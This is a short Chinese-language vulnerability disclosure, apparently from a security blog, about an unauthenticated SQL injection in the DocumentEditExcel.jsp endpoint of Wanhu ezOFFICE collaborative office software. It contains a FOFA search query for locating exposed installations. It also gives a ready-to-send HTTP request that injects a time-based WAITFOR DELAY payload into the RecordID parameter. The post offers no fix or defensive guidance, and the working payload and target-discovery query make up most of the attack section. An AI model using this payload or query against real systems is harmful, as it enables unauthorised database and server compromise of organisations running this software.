0x01 產(chǎn)品簡(jiǎn)介

萬(wàn)戶OA ezoffice是萬(wàn)戶網(wǎng)絡(luò)協(xié)同辦公產(chǎn)品多年來(lái)一直將主要精力致力于中高端市場(chǎng)的一款OA協(xié)同辦公軟件產(chǎn)品，統(tǒng)一的基礎(chǔ)管理平臺(tái)，實(shí)現(xiàn)用戶數(shù)據(jù)統(tǒng)一管理、權(quán)限統(tǒng)一分配、身份統(tǒng)一認(rèn)證。統(tǒng)一規(guī)劃門戶網(wǎng)站群和協(xié)同辦公平臺(tái)，將外網(wǎng)信息維護(hù)、客戶服務(wù)、互動(dòng)交流和日常工作緊密結(jié)合起來(lái)，有效提高工作效率。

0x02 漏洞概述

萬(wàn)戶 ezOFFICE DocumentEditExcel.jsp接口存在SQL注入漏洞，未授權(quán)的攻擊者可利用此漏洞獲取數(shù)據(jù)庫(kù)權(quán)限，深入利用可獲取服務(wù)器權(quán)限。

0x03 復(fù)現(xiàn)環(huán)境

FOFA：app="萬(wàn)戶ezOFFICE協(xié)同管理平臺(tái)"

0x04 漏洞復(fù)現(xiàn)

PoC

GET /defaultroot/public/iWebOfficeSign/DocumentEditExcel.jsp;?RecordID=1%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close